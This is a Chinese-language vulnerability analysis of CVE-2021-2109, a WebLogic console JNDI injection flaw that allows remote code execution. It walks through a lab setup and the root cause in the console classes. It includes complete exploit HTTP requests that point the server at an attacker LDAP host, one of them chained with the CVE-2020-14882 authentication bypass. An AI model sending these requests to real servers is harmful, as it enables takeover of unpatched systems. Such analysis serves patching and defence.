WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。
-
WebLogic 10.3.6.0.0
-
WebLogic 12.1.3.0.0
-
WebLogic 12.2.1.3.0
-
WebLogic 12.2.1.4.0
-
WebLogic 14.1.1.0.0
与CVE-2020-14645复现时的搭建方式相同
选用jdk-8u181,weblogic12.1.4.0
搭建漏洞环境,因为是通过 JNDI 注入进行的远程命令执行,所以会受到 JDK 版本的影响
JNDI 注入的 JDK 版本如图所示
下载 weblogic 安装包后,以管理员身份打开cmd控制台
执行完下面命令后,一路next就好
java -jar fmw_12.2.1.4.0_wls_lite_generic.jar
安装完成之后,启动
C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domainstartWebLogic.cmd
就可以启动 Weblogic
设置调试的话修改
user_project/domains/bin目录中
setDomainEnv.cmd或者setDomainEnv.sh文件
在if "%debugFlag%"=="true" 前加入
set debugFlag=true
在同一文件中,通过set DEBUG_PORT=8453
指定了远程调试的端口,拷贝Oracle_Home目录下所有文件至调试目录,配置 Remote 方式进行远程调试,端口为 8453
利用 JNDI 注入工具生成payload
https://github.com/welk1n/JNDI-Injection-Exploit
登录 weblogic 控制台,发送数据包
POST /console/consolejndi.portal HTTP/1.1Host: 192.168.176.167:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: http://192.168.176.167:7001/console/css/%252e%252e%252f/consolejndi.portalAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: ADMINCONSOLESESSION=Dxo4Mj2wREQ8hHIy7WpBfolb35JVathlBeQhVN6hjuJCRzKBUGDi!-1446449740Connection: closeContent-Length: 163_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.176;1:1389/pq2ld0;AdminServer%22)
可以结合CVE-2020-14882权限绕过漏洞,删除cookie,重新构造数据包
POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1Host: 192.168.176.167:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: http://192.168.176.167:7001/console/css/%252e%252e%252f/consolejndi.portalAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 163_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.176;1:1389/pq2ld0;AdminServer%22)
我们注意到漏洞poc中包含类
com.bea.console.handles.JndiBindingHandle
我们就在其中添加断点
console.jar!com.bea.console.handles.JndiBindingHandle#JndiBindingHandle(java.lang.String)
我们注意到JndiBindingHandle是一些初始化操作,进行实例化。
我们查看
Oracle_Home/wlserver/server/lib/consoleapp/webapp/consolejndi.portal文件,发现标签 JNDIBindingPageGeneral 指定的路径是 /PortalConfig/jndi/jndibinding.portlet
跟进文件 jndibinding.portlet
看到程序最终调用 JNDIBindingAction 类
Oracle_Home/wlserver/server/lib/consoleapp/webapp/PortalConfig/jndi/jndicontext.portlet
我们在 JNDIBindingAction 类的函数 execute 中,看到了 JNDI 注入的关键函数 lookup,通过 lookup 去引用命名服务(RMI)和目录服务(LDAP)
console.jar!com.bea.console.actions.jndi.JNDIBindingAction#execute
我们可以看到 lookup 中的值来源于 bindingHandle.getContext() + bindingHandle.getBinding() ,同时要执行到 lookup 需要满足 serverMBean != null ,serverName 的值来自 bindingHandle.getServer()
ServerMBean serverMBean = MBeanUtils.getAnyServerMBean(serverName);
console.jar!ccom.bea.console.utils.MBeanUtils#getAnyServerMBean(java.lang.String)
跟进lookupServer
com.oracle.weblogic.management.beanimpls.jar!weblogic.management.configuration.DomainMBeanImpl#lookupServer
在这里如果要满足有返回值的,传入的值必须等于 bean.getName() ,通过获取 this._Servers[0].getName() 可以得到这个值为 AdminServer
满足了执行条件之后,我们继续返回 JNDIBindingAction#execute 查看 lookup 函数中的参数的传入来自于
而context、bindName、serverName的值都是从bindingHandle中获取的,正巧我们可以控制JndiBindingHandle实例化的值(objectIdentifier),接着来就需要看下objectIdentifier和以上3个值有什么关系了,看一下3个成员变量的get函数,发现他们都和Component有关,
console.jar!com.bea.console.handles.JndiBindingHandle
跟进 getComponent
console.jar!com.bea.console.handles.HandleImpl#getComponent
跟进 getComponents
console.jar!com.bea.console.handles.HandleImpl#getComponents
我们可以看到函数 getComponents 就是通过 this.getObjectIdentifier() 获取 objectIdentifier 的值,进而通过分号 ; 分隔开来,并将分割后的数据填入 String 数组。我们想要控制的参数都可以通过控制 objectIdentifier 的值来实现。this.objectIdentifier 是在 JndiBindingHandle 类中的构造函数中初始化的。
console.jar!com.bea.console.utils.HandleUtils#handleFromQueryString
会获取参数中以 handle 为结尾的键值,再根据 request 请求的参数生产 handle 对象
console.jar!ccom.bea.console.handles.HandleConverter#convert
console.jar!com.bea.console.handles.HandleFactory#getHandle
所以我们在请求中设置
JndiBindingHandlehandle=com.bea.console.handles.JndiBindingHandle("ldap://127.0.0.1:1389/Evil"), lookup中的参数有两个,会将两个参数用.拼接起来,所以我们可以将 ldap://127.0.0.1:1389/Evil 中的任意一个 . 替换为 ; 同时还需要让serverName = AdminServer ,所以最后为 JndiBindingHandlehandle=com.bea.console.handles.JndiBindingHandle("ldap://127.0.0;1:1389/Evil;AdminServer")
1、升级Weblogic Server运行环境的JDK版本;
2、升级官方安全补丁,参考Oracle官网发布的补丁:Oracle Critical Patch Update Advisory - January 2021
https://www.oracle.com/security-alerts/cpujan2021.html参考链接:
本文始发于微信公众号(Timeline Sec):CVE-2021-2109:Weblogic远程代码执行分析复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论